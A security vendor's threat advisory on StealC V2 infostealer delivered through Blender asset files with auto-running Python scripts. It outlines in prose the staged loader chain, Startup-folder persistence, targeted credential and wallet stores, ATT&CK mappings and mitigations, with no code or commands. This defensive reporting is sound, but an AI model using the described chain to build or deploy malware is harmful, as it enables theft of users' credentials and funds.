.png){kind=logo}
StealC V2 Infostealer Delivered via Malicious Blender 3D Asset Files: Threat Analysis and Mitigation
- Rescana
- 2 days ago
- 5 min read
Executive Summary
A newly identified cyber threat campaign is exploiting the popularity and extensibility of Blender—a widely used open-source 3D creation suite—by weaponizing 3D asset files to deliver the advanced StealC V2 data-stealing malware. This campaign, attributed to Russian-speaking threat actors, leverages Blender’s legitimate “Auto Run Python Scripts” feature to execute malicious code embedded within .blend files. Once executed, the malware establishes persistence, evades detection, and exfiltrates sensitive data from a wide array of applications, including browsers, cryptocurrency wallets, messaging platforms, and VPN clients. The attack chain is notable for its sophistication, stealth, and abuse of trusted creative supply chains, posing a significant risk to organizations and individuals in the creative, gaming, and digital asset sectors.
Threat Actor Profile
The campaign is attributed to Russian-speaking threat actors with a history of deploying StealC and leveraging Pyramid C2 infrastructure. These actors have previously targeted creative and gaming communities, often impersonating reputable organizations such as the Electronic Frontier Foundation (EFF) to increase the credibility of their lures. The current operation demonstrates a high level of technical proficiency, operational security, and adaptability, as evidenced by the use of legitimate cloud infrastructure (such as Cloudflare Workers) for command and control, and the rapid deployment of undetectable malware variants. The threat actors’ tactics, techniques, and procedures (TTPs) align with those observed in prior StealC campaigns, including the use of multi-stage loaders, redundant payloads, and advanced evasion techniques.
Technical Analysis of Malware/TTPs
The attack begins with the distribution of malicious Blender.blend files on popular 3D asset marketplaces, such as CGTrader. These files contain embedded Python scripts—commonly named Rig_Ui.py—which are executed automatically if the victim has enabled the “Auto Run Python Scripts” feature in Blender. Upon execution, the script initiates a multi-stage infection process:
The embedded Python script contacts a Cloudflare Workers domain to retrieve a malware loader. This loader then downloads a PowerShell script, which in turn fetches two ZIP archives—ZalypaGyliveraV1 and BLENDERX—from attacker-controlled IP addresses. These archives are extracted into the system’s %TEMP% directory, and malicious LNK shortcut files are placed in the Windows Startup folder to ensure persistence across reboots.
The primary payload is StealC V2, a sophisticated infostealer capable of harvesting credentials, session tokens, and sensitive files from over 23 browsers (including Google Chrome version 132 and above), more than 100 cryptocurrency wallet browser extensions, 15+ standalone wallet applications, messaging clients such as Telegram, Discord, Tox, and Pidgin, VPN clients like ProtonVPN and OpenVPN, and email clients including Thunderbird. An auxiliary Python-based stealer is also deployed for redundancy.
StealC V2 incorporates advanced evasion features, including updated User Account Control (UAC) bypass techniques and anti-analysis measures. Notably, the malware was undetected by all major antivirus engines on VirusTotal at the time of discovery, underscoring its stealth and the limitations of signature-based defenses.
The campaign’s TTPs map to several MITRE ATT&CK techniques, including T1059.006 (Command and Scripting Interpreter: Python), T1059.001 (PowerShell), T1204.002 (User Execution: Malicious File), T1547.001 (Persistence via Startup Folder), T1566.001 (Phishing via Malicious Attachments), T1112 (Registry Modification), and T1555 (Credential Access from Password Stores).
Exploitation in the Wild
This campaign has been active since at least May 2025, with malicious .blend files distributed via CGTrader and potentially other 3D asset platforms. The attackers exploit Blender’s documented but risky “Auto Run Python Scripts” feature, which, when enabled, allows embedded scripts to execute without user interaction. This feature is present in all supported versions of Blender, including 2.8x, 2.9x, 3.x, 4.x, and 5.x, and is enabled by default in some configurations for workflow convenience.
Victims are typically creative professionals, game developers, and digital artists who download and open 3D assets from online marketplaces. The campaign’s reliance on trusted supply chains and the absence of antivirus detection for the latest StealC V2 variant significantly increase the risk of widespread compromise. The use of legitimate cloud infrastructure for command and control further complicates detection and takedown efforts.
Victimology and Targeting
The primary targets of this campaign are users of 3D asset marketplaces, particularly those in the creative, gaming, and digital content production sectors. The attack is opportunistic, relying on the popularity of Blender and the widespread practice of downloading third-party assets to maximize its reach. While the campaign is global in scope, attribution to Russian-speaking actors suggests a focus on regions with active creative and gaming communities, including North America, Europe, and parts of Asia.
Victims are typically individuals and organizations that use Blender for 3D modeling, animation, and game development. The attackers exploit the trust placed in reputable asset marketplaces and the convenience of automated script execution to bypass traditional security controls. The targeting of cryptocurrency wallets, messaging apps, and VPN clients indicates a dual focus on both financial gain and potential lateral movement within compromised organizations.
Mitigation and Countermeasures
To mitigate the risk posed by this campaign, organizations and individuals should take the following actions:
Disable the “Auto Run Python Scripts” feature in Blender by navigating to Edit > Preferences > Save & Load and unchecking the Auto Run Python Scripts option. This prevents embedded scripts from executing automatically when opening .blend files.
Treat all 3D asset files as potentially executable content. Only download and open assets from trusted publishers, and consider testing unknown files in isolated, sandboxed environments before use in production workflows.
Monitor for indicators of compromise, including suspicious PowerShell activity, the presence of unknown LNK files in the Windows Startup folder, and outbound connections to known command and control infrastructure associated with StealC V2.
Ensure that endpoint detection and response (EDR) and antivirus solutions are updated with the latest threat intelligence and signatures related to StealC V2 as they become available. However, be aware that signature-based detection may lag behind rapidly evolving malware variants.
Educate users—especially those in creative and development roles—about the risks of enabling automated script execution and the importance of verifying the provenance of downloaded assets.
Implement network segmentation and least privilege principles to limit the potential impact of a successful compromise, particularly in environments where sensitive credentials, cryptocurrency wallets, or proprietary assets are at risk.
References
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chains. Our platform leverages real-time threat intelligence, automated risk scoring, and actionable insights to help customers proactively defend against emerging threats and ensure the resilience of their business operations. For more information about how Rescana can help secure your organization, or for any questions regarding this advisory, please contact us at ops@rescana.com.
